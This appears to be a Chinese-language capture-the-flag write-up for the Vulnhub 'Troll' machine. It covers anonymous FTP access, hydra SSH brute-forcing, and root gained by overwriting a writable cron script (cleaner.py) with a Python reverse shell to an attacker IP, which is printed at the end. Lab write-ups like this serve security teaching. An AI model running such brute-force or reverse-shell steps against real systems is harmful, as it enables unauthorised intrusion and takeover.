当前位置：首页 > news >正文

[Vulnhub] Troll FTP匿名登录+定时任务权限提升

news 来源：原创 2024/7/3 2:25:44

信息收集

IP Address	Ports Opening
192.168.8.104	TCP:21,22,80

$ nmap -sC -sV 192.168.8.104 -p- --min-rate 1000

Nmap scan report for 192.168.8.104 (192.168.8.104)
Host is up (0.0042s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.8.107
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP匿名登录

ftp匿名登录

使用wireshark打开

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!

http://192.168.8.104/sup3rs3cr3tdirlol/

将账号保存

密码

$ hydra -s 22 -v -V -L user.txt -p "Good_job_:)" -e n -t 1 -w 30 192.168.8.104 ssh

服务器检测到爆破ssh行为就会封禁IP,测试下来发现密码不正确,尝试密码Pass.txt

username:overflow
password:Pass.txt

SSH

$ ssh overflow@192.168.8.104

有趣的是两分钟后,你将会被自动踢下线

Local.txt 截屏

Local.txt 内容

d637cc968971b87d5b575ddfe2d50408

权限提升

通过目录搜索

日志中描述了存在一个两分钟的定时任务

$ find / -name cleaner.py

$ ls -la /lib/log/cleaner.py

$ nano /lib/log/cleaner.py

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.8.107",10033));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")